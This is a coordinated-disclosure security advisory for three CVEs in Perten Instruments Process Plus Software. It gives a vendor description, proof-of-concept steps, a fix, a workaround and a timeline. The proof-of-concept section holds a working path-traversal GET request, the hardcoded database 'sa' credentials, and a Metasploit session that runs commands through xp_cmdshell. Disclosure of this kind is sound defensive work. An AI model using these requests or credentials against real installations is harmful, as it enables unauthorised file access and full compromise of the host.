CyberDanube Security Research 20240722-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| Perten Instruments Process Plus Software vulnerable version| <=1.11.6507.0 fixed version| 2.0.0 CVE number| CVE-2024-6911, CVE-2024-6912, CVE-2024-6913 impact| High homepage| https://perkinelmer.com found| 2024-04-24 by| S. Dietz, T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. Plten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "For 85 years, PerkinElmer has pushed the boundaries of science from food to health to the environment. Weve always pursued science with a clear purpose to help our customers achieve theirs. Our expert team brings technology and intangibles, like creativity, empathy, diligence, and a spirit of collaboration, in equal measure, to fulfill our customers desire to work better, innovate better, and create better. PerkinElmer is a leading, global provider of technology and service solutions that help customers measure, quantify, detect, and report in ways that help ensure the quality, safety, and satisfaction of their products." Source: https://www.perkinelmer.com/ Vulnerable versions ------------------------------------------------------------------------------- ProcessPlus Software / <=1.11.6507.0 Vulnerability overview ------------------------------------------------------------------------------- 1) Unauthenticated Local File Inclusion (CVE-2024-6911) A LFI was identified in the web interface of the device. An attacker can use this vulnerability to read system-wide files and configuration. 2) Hardcoded MSSQL Credentials (CVE-2024-6912) The software is using the same MSSQL credentials across multiple installations. In combination with 3), this allows an attacker to fully compromise the host. 3) Execution with Unnecessary Privileges (CVE-2024-6913) The software uses the user "sa" to connect to the database. Access to this account allows an attacker to execute commands via the "xp_cmdshell" procedure. Proof of Concept ------------------------------------------------------------------------------- 1) Unauthenticated Local File Inclusion (CVE-2024-6911) The LFI can be triggered by using the following GET Request: ------------------------------------------------------------------------------- GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1 Host: 192.168.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Upgrade-Insecure-Requests: 1 ------------------------------------------------------------------------------- This example returns the content from "C:\Windows\System32\drivers\etc\hosts" of an affected installation. 2) Hardcoded MSSQL Credentials (CVE-2024-6912) Analysis across multiple installations show that the configuration file "\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml" contains credentials: ------------------------------------------------------------------------------- [...] <OPCDA_Server dbconnectstring="Driver={SQL Server};SERVER=.\PertenSQL; DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno" application_id="1" appid="Perten.OPCDA.Server" loglevel="info" logfile="C:\Perten\ProcessPlus\Log\opcserver.log"> [...] ------------------------------------------------------------------------------- These credentials "sa:enilno" were re-used in all reviewed installations. 3) Execution with Unnecessary Privileges (CVE-2024-6913) The application uses the "sa" user to authenticate with the database. By using Metasploit an attacker can execute arbitrary commands: ------------------------------------------------------------------------------- msf6 auxiliary(admin/mssql/mssql_exec) > show options Module options (auxiliary/admin/mssql/mssql_exec): Name Current Setting ---- --------------- CMD dir PASSWORD enilno RHOSTS 192.168.0.1 RPORT 1433 TDSENCRYPTION false TECHNIQUE xp_cmdshell USERNAME sa USE_WINDOWS_AUTHENT false msf6 auxiliary(admin/mssql/mssql_exec) > run [*] Running module against 192.168.0.1 [*] 192.168.0.1:1433 - SQL Query: EXEC master..xp_cmdshell 'dir' [...] Directory of C:\Windows\system32 01/23/2024 13:37 AM <DIR> . 01/23/2024 13:37 AM <DIR> .. 01/23/2024 13:37 AM <DIR> 0123 01/23/2024 13:37 AM <DIR> 0123 01/23/2024 13:37 AM 232 @AppHelpToast.png 01/23/2024 13:37 AM 308 @AudioToastIcon.png [...] Solution ------------------------------------------------------------------------------- Update to version 2.0.0. Workaround ------------------------------------------------------------------------------- Restrict network access to the host with the installed software. Change the default credentials of the database in the config file and the database itself. Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Perten customers to upgrade the software to the latest version available and to restrict network access to the management interface. Contact Timeline ------------------------------------------------------------------------------- 2024-04-29: Contacting PerkinElmer via dpo@perkinelmer.com. 2024-05-13: Vendor asked for unencrypted advisory. 2024-05-16: Sent advisory to vendor. 2024-05-22: Asked for status update. No answer. 2024-05-28: Asked for status update. Contact stated that they are working on a fix. 2024-06-10: Asked for status update. Contact stated that all issues should be fixed by end of month. Local file inclusion should be fixed in version 1.16. Asked for a release date of version 1.16. No answer. 2024-07-13: Asked for status update. 2024-07-15: Contact stated, that all three issues have been fixed in version 2.0.0 which have been released on 2024-07-11. 2024-07-16: Asked for a link to the firmware update release. 2024-07-17: Set release date to 2024-07-22. 2024-07-22: Coordinated release of security advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF S. Dietz, T. Weber / @2024